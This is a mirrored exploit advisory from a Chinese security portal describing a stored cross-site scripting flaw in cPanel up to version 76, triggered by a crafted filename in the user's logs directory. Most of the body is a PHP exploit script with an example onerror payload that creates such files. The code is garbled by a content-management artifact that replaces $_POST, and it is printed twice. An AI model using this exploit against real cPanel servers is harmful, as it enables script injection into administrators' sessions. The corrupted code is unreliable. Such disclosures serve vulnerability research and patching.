首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
cPanel 76 Cross Site Scripting
来源:root@numanozdemir.com 作者:OZDEMIR 发布时间:2018-08-16  
[+] Title: cPanel Filename Based Stored XSS <= v76

[+] Author: Numan OZDEMIR

[+] Vendor Homepage: cpanel.com

[+] Version: Up to v76.

[+] Discovered by Numan OZDEMIR in InfinitumIT Labs

[+] root@numanozdemir.com - info@infinitumit.com.tr

[~] Description:
Attacker can run JavaScript codes on this page:
http://ip:2082/cpsessXXXXXXXXXX/frontend/THEME/raw/index.html

[~] How to Reproduce:
Create a file as named with your payload in /home/user/logs directory
or run this php exploit:

<center>
<?php
$p = 
___FCKpd___0
POST['payload']; $x = get_current_user(); $dir = "/home/".$x."/logs/"; if(
___FCKpd___0
POST){ if(touch($dir.$p)){ die(' Successfully exploited. Visit <br> http://ip:2082/cpsessXXXXXXXXXX/frontend/THEME/raw/index.html '); }else{ die('An error occured.'); } }else{ echo 'Enter your payload: <form action="" method="post"><input type="text" name="payload" placeholder="<img src onerror=alert(2)>"> <input type="submit" value=">>"></form>'; } // end of the script. ?> Note: You cant create a file as named with / (slash) character by this exploit. This vulnerability is disclosed by cPanel Team's confirmation. // for secure days...<center> <?php $p =
___FCKpd___0
POST['payload']; $x = get_current_user(); $dir = "/home/".$x."/logs/"; if(
___FCKpd___0
POST){ if(touch($dir.$p)){ die(' Successfully exploited. Visit <br> http://ip:2082/cpsessXXXXXXXXXX/frontend/THEME/raw/index.html '); }else{ die('An error occured.'); } }else{ echo 'Enter your payload: <form action="" method="post"><input type="text" name="payload" placeholder="<img src onerror=alert(2)>"> <input type="submit" value=">>"></form>'; } // end of the script. ?>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Cloudme 1.9 - Buffer Overflow
·Foxit Reader 9.0.1.1049 Buffer
·cgit 1.2.1 - Directory Travers
·ObserverIP Scan Tool 1.4.0.1 -
·Wansview 1.0.2 - Denial of Ser
·Central Management Software 1.
·Mikrotik WinBox 6.42 - Credent
·Oracle GlassFish Server 4.1 Di
·OpenSSH 2.3 < 7.7 - Username E
·iSmartViewPro 1.5 Buffer Overf
·CEWE Photoshow 6.3.4 - Denial
·Microsoft DirectX SDK (June 20
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved